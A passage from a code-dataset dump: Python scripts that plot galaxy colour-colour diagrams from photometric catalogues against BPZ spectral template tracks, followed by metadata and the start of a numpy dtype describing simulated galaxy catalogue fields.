/software/bpz-1.99.3/AB/Im_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsbc_u=sbc_u[:100] # in order to constrain the redshift between 0 and 1\nsbc_g=sbc_g[:100]\nsbc_r=sbc_r[:100]\nel_u=el_u[:100]\nel_g=el_g[:100]\nel_r=el_r[:100]\nscd_u=scd_u[:100]\nscd_g=scd_g[:100]\nscd_r=scd_r[:100]\nsb3_u=sb3_u[:100]\nsb3_g=sb3_g[:100]\nsb3_r=sb3_r[:100]\nsb2_u=sb2_u[:100]\nsb2_g=sb2_g[:100]\nsb2_r=sb2_r[:100]\nim_u=im_u[:100]\nim_g=im_g[:100]\nim_r=im_r[:100]\nplt.plot(-2.5*np.log10(sbc_u/sbc_g),-2.5*np.log10(sbc_g/sbc_r),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_u/el_g),-2.5*np.log10(el_g/el_r),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_u/scd_g),-2.5*np.log10(scd_g/scd_r),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_u/sb3_g),-2.5*np.log10(sb3_g/sb3_r),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_u/sb2_g),-2.5*np.log10(sb2_g/sb2_r),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_u/im_g),-2.5*np.log10(im_g/im_r),color='gray',label='Im')\nplt.xlabel(\"u-g\")\nplt.ylabel(\"g-r\")\nplt.xlim((-0.5,2))\nplt.ylim((-0.5,2.5))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\nu,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz.cat\",usecols=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],unpack=True)\nu = u + 1.42\ng = g + 0.01\nr = r + 0.03\ni = i + 0.00\nz = z - 0.02\nY = Y - 0.09\nJ = J - 0.075\nH = H - 0.02\nK = K - 0.07\nerr_x = np.sqrt(g_err**2 + 
r_err**2)\nerr_y = np.sqrt(r_err**2 + i_err**2)\nplt.clf()\nplt.errorbar(g-r,r-i,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsbc_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsbc_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nel_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nel_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nel_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nscd_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nscd_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nscd_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb3_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb3_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb3_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb2_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb2_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb2_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nim_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nim_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nim_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsbc_g=sbc_g[:100] # in order to constrain the redshift between 0 and 1\nsbc_r=sbc_r[:100]\nsbc_i=sbc_i[:100]\nel_g=el_g[:100]\nel_r=el_r[:100]\nel_i=el_i[:100]\nscd_g=scd_g[:100]\nscd_r=scd_r[:100]\nscd_i=scd_i[:100]\nsb3_g=sb3_g[:100]\nsb3_r=sb3_r[:100]\nsb3_i=sb3_i[:100]\nsb2_g=sb2_g[:100]\nsb2_r=sb2_r[:100]\nsb2_i=sb2_i[:100]\nim_g=im_g[:100]\nim_r=im_r[:100]\nim_i=im_i[:100]\nplt.plot(-2.5*np.log10(sbc_g/sbc_r),-2.5*np.log10(sbc_r/sbc_i),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_g/el_r),-2.5*np.log10(el_r/el_i),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_g/scd_r),-2.5*np.log10(scd_r/scd_i),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_g/sb3_r),-2.5*np.log10(sb3_r/sb3_i),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_g/sb2_r),-2.5*np.log10(sb2_r/sb2_i),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_g/im_r),-2.5*np.log10(im_r/im_i),color='gray',label='Im')\nplt.xlabel(\"g-r\")\nplt.ylabel(\"r-i\")\n#plt.xlim((0,2.5))\n#plt.ylim((-0.5,1.5))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\nu,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz.cat\",usecols=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],unpack=True)\nu = u + 1.42\ng = g + 0.01\nr = r + 0.03\ni = i + 0.00\nz = z - 0.02\nY = Y - 0.09\nJ = J - 0.075\nH = H - 0.02\nK = K - 
0.07\nerr_x = np.sqrt(r_err**2 + i_err**2)\nerr_y = np.sqrt(i_err**2 + z_err**2)\nplt.clf()\nplt.errorbar(r-i,i-z,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsbc_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsbc_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nel_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nel_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nel_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nscd_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nscd_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nscd_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb3_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb3_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb3_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb2_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb2_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb2_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nim_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nim_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nim_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsbc_r=sbc_r[:100] # in order to constraint redshift between 0 and 1\nsbc_i=sbc_i[:100]\nsbc_z=sbc_z[:100]\nel_r=el_r[:100]\nel_i=el_i[:100]\nel_z=el_z[:100]\nscd_r=scd_r[:100]\nscd_i=scd_i[:100]\nscd_z=scd_z[:100]\nsb3_r=sb3_r[:100]\nsb3_i=sb3_i[:100]\nsb3_z=sb3_z[:100]\nsb2_r=sb2_r[:100]\nsb2_i=sb2_i[:100]\nsb2_z=sb2_z[:100]\nim_r=im_r[:100]\nim_i=im_i[:100]\nim_z=im_z[:100]\nplt.plot(-2.5*np.log10(sbc_r/sbc_i),-2.5*np.log10(sbc_i/sbc_z),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_r/el_i),-2.5*np.log10(el_i/el_z),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_r/scd_i),-2.5*np.log10(scd_i/scd_z),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_r/sb3_i),-2.5*np.log10(sb3_i/sb3_z),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_r/sb2_i),-2.5*np.log10(sb2_i/sb2_z),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_r/im_i),-2.5*np.log10(im_i/im_z),color='gray',label='Im')\nplt.xlabel(\"r-i\")\nplt.ylabel(\"i-z\")\n#plt.xlim((0,2.5))\n#plt.ylim((-0.5,1.5))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\nu,u_err,g,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err,J,J_err,H,H_err,K,K_err=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz.cat\",usecols=[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],unpack=True)\nu = u + 1.42\ng = g + 0.01\nr = r + 0.03\ni = i + 0.00\nz = z - 0.02\nY = Y - 0.09\nJ = J - 
0.075\nH = H - 0.02\nK = K - 0.07\nerr_x = np.sqrt(i_err**2 + z_err**2)\nerr_y = np.sqrt(z_err**2 + Y_err**2)\nplt.clf()\nplt.errorbar(i-z,z-Y,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsbc_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsbc_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nel_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nel_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nel_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nscd_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nscd_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nscd_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsb3_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb3_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb3_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsb2_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb2_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb2_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nim_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nim_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nim_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsbc_i=sbc_i[:100] # in order to constraint redshift between 0 and 1\nsbc_z=sbc_z[:100]\nsbc_Y=sbc_Y[:100]\nel_i=el_i[:100]\nel_z=el_z[:100]\nel_Y=el_Y[:100]\nscd_i=scd_i[:100]\nscd_z=scd_z[:100]\nscd_Y=scd_Y[:100]\nsb3_i=sb3_i[:100]\nsb3_z=sb3_z[:100]\nsb3_Y=sb3_Y[:100]\nsb2_i=sb2_i[:100]\nsb2_z=sb2_z[:100]\nsb2_Y=sb2_Y[:100]\nim_i=im_i[:100]\nim_z=im_z[:100]\nim_Y=im_Y[:100]\nplt.plot(-2.5*np.log10(sbc_i/sbc_z),-2.5*np.log10(sbc_z/sbc_Y),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_i/el_z),-2.5*np.log10(el_z/el_Y),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_i/scd_z),-2.5*np.log10(scd_z/scd_Y),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_i/sb3_z),-2.5*np.log10(sb3_z/sb3_Y),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_i/sb2_z),-2.5*np.log10(sb2_z/sb2_Y),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_i/im_z),-2.5*np.log10(im_z/im_Y),color='gray',label='Im')\nplt.xlabel(\"i-z\")\nplt.ylabel(\"z-Y\")\nplt.xlim((-1,1))\nplt.ylim((-0.5,1))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\ng,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err=np.loadtxt(\"DESlarge_matchDominique_gals.cat\",usecols=[3,4,5,6,7,8,9,10,11,12],unpack=True)\ng = g + 0.00\nr = r + 0.00\ni = i + 0.00\nz = z + 0.00\nY = Y + 0.00\nerr_x = np.sqrt(g_err**2 + r_err**2)\nerr_y = np.sqrt(r_err**2 + 
i_err**2)\nplt.clf()\nplt.errorbar(g-r,r-i,xerr=err_x,yerr=err_y,color='black',linestyle=\"None\")\nsbc_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsbc_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsbc_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nel_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nel_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nel_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nscd_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nscd_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nscd_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb3_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb3_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb3_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb2_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nsb2_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nsb2_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nim_g=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.g_DEC.AB\",usecols=[1],unpack=True)\nim_r=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.r_DEC.AB\",usecols=[1],unpack=True)\nim_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsbc_g=sbc_g[:100] # in order to constraint redshift between 0 and 1\nsbc_r=sbc_r[:100]\nsbc_i=sbc_i[:100]\nel_g=el_g[:100]\nel_r=el_r[:100]\nel_i=el_i[:100]\nscd_g=scd_g[:100]\nscd_r=scd_r[:100]\nscd_i=scd_i[:100]\nsb3_g=sb3_g[:100]\nsb3_r=sb3_r[:100]\nsb3_i=sb3_i[:100]\nsb2_g=sb2_g[:100]\nsb2_r=sb2_r[:100]\nsb2_i=sb2_i[:100]\nim_g=im_g[:100]\nim_r=im_r[:100]\nim_i=im_i[:100]\nplt.plot(-2.5*np.log10(sbc_g/sbc_r),-2.5*np.log10(sbc_r/sbc_i),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_g/el_r),-2.5*np.log10(el_r/el_i),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_g/scd_r),-2.5*np.log10(scd_r/scd_i),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_g/sb3_r),-2.5*np.log10(sb3_r/sb3_i),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_g/sb2_r),-2.5*np.log10(sb2_r/sb2_i),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_g/im_r),-2.5*np.log10(im_r/im_i),color='gray',label='Im')\nplt.xlabel(\"g-r\")\nplt.ylabel(\"r-i\")\n#plt.xlim((0,2.5))\n#plt.ylim((-0.5,1.5))\nplt.legend()\nplt.show()\n\n##################################\n\nimport pylab as plt\ng,g_err,r,r_err,i,i_err,z,z_err,Y,Y_err=np.loadtxt(\"DESlarge_matchDominique_gals.cat\",usecols=[3,4,5,6,7,8,9,10,11,12],unpack=True)\ng = g + 0.00\nr = r + 0.00\ni = i + 0.00\nz = z + 0.00\nY = Y + 0.00\nerrx_x = np.sqrt(i_err**2 + z_err**2)\nerrx_y = np.sqrt(z_err**2 + 
Y_err**2)\nplt.clf()\nplt.errorbar(i-z,z-Y,xerr=errx_x,yerr=errx_y,color='black',linestyle=\"None\")\nsbc_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsbc_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsbc_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Sbc_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nel_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nel_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nel_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/El_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nscd_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nscd_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nscd_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Scd_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsb3_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb3_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb3_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB3_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsb2_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nsb2_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nsb2_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/SB2_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nim_i=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.i_DEC.AB\",usecols=[1],unpack=True)\nim_z=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.z_DEC.AB\",usecols=[1],unpack=True)\nim_Y=np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/AB/Im_B2004a.Y_DEC.AB\",usecols=[1],unpack=True)\nsbc_i=sbc_i[:100] # in order to constraint redshift between 0 and 1\nsbc_z=sbc_z[:100]\nsbc_Y=sbc_Y[:100]\nel_i=el_i[:100]\nel_z=el_z[:100]\nel_Y=el_Y[:100]\nscd_i=scd_i[:100]\nscd_z=scd_z[:100]\nscd_Y=scd_Y[:100]\nsb3_i=sb3_i[:100]\nsb3_z=sb3_z[:100]\nsb3_Y=sb3_Y[:100]\nsb2_i=sb2_i[:100]\nsb2_z=sb2_z[:100]\nsb2_Y=sb2_Y[:100]\nim_i=im_i[:100]\nim_z=im_z[:100]\nim_Y=im_Y[:100]\nplt.plot(-2.5*np.log10(sbc_i/sbc_z),-2.5*np.log10(sbc_z/sbc_Y),color='blue',label='Sbc')\nplt.plot(-2.5*np.log10(el_i/el_z),-2.5*np.log10(el_z/el_Y),color='red',label='El')\nplt.plot(-2.5*np.log10(scd_i/scd_z),-2.5*np.log10(scd_z/scd_Y),color='cyan',label='Scd')\nplt.plot(-2.5*np.log10(sb3_i/sb3_z),-2.5*np.log10(sb3_z/sb3_Y),color='magenta',label='SB3')\nplt.plot(-2.5*np.log10(sb2_i/sb2_z),-2.5*np.log10(sb2_z/sb2_Y),color='brown',label='SB2')\nplt.plot(-2.5*np.log10(im_i/im_z),-2.5*np.log10(im_z/im_Y),color='gray',label='Im')\nplt.xlabel(\"i-z\")\nplt.ylabel(\"z-Y\")\nplt.xlim((-1,1.5))\nplt.ylim((-2.5,2))\nplt.legend()\nplt.show()\n" }, { "alpha_fraction": 0.486184298992157, "alphanum_fraction": 0.5217205286026001, "avg_line_length": 80.63953399658203, "blob_id": "af4d61ea3b50cdb96a90218284631d46b8b98c4e", "content_id": "6f8ec2d7d23e20c2be08a7abfc54765ee27d0cb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14042, "license_type": "no_license", "max_line_length": 292, "num_lines": 172, "path": "/python/scripts/MPA/read.py", "repo_name": "eduardrusu/zMstarPDF", 
"src_encoding": "UTF-8", "text": "import math\nimport numpy as np\n\ngalaxy_struct = np.dtype([\n ('galaxy_id' ,'i8' ), #0_LL $ , , id of galaxy (unique)\n ('halo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('first_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('next_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('last_prog_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('FOF_central_gal' ,'i8' ), #0_LL $ , , id of fof halo the galaxy belong to (i.e. common id for all galaxies in same group or cluster)\n ('file_tree_nr' ,'i8' ), #0_LL $ , , id of file containing the merger tree the galaxy belongs to\n ('descendant_gal' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('main_leaf_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('tree_root_id' ,'i8' ), #0_LL $ , , id of some other galaxy needed for galaxy merger tree structure\n ('subhalo_id' ,'i8' ), #0_LL $ , , id of (sub)halo, the galaxy belongs to(?)\n ('main_subhalo_id' ,'i8' ), #0_LL $ , , id of main (sub)halo of fof halo, the galaxy belongs to(?)\n ('peano_key' ,'i4' ), #0L $ , , id of small subcube of simulation cube containing galaxy\n ('redshift' ,'f4' ), #0.0 $ , , redshift of galaxy\n ('type' ,'i4' ), #0L $ , , indicated positional status of galaxy in fof group (0 = central, 1 = satellite with subhalo, 2= satellite without resolved subhalo)\n ('snapshot_number' ,'i4' ), #0L $ , , simulation snapshot the galaxy belongs to\n ('group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy belongs to\n ('next_group_number' ,'i4' ), #0L $ , , yet another id of the fof halo the galaxy will belong to in the next snapshot\n ('cube_index' ,'i4' ), #0L $ , , index of periodic copy of simulation cube the galaxy is located\n ('central_m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group the galaxy resides in.\n ('central_r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , virial radius (as defined by r_crit200) of the FOF group the galaxy resides in\n ('position' ,'f4', 3), #fltarr(3) $ , [rad, rad, Mpc/h] , angular position (first two components) and line-of-sight comoving distance (last component) of galaxy\n ('velocity' ,'f4', 3), #fltarr(3) $ , [km/s] , physical peculiar velocity of galaxy (first two components transverse, last component parallel to l.o.s.)\n ('len' ,'i4' ), #0L $ , , number of particle in subhalo associated with galaxy\n ('m_vir' ,'f4' ), #0.0 $ , [10^10 Msun/h] , virial mass (as defined by m_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. current mass for type 0 galaxies, \"infall virial mass\" for type 1,2 galaxies.\n ('r_vir' ,'f4' ), #0.0 $ , [Mpc/h] , comoving virial radius (as defined by r_crit200) of the FOF group this galaxy was in when last it was a type 0 galaxy. I.e. 
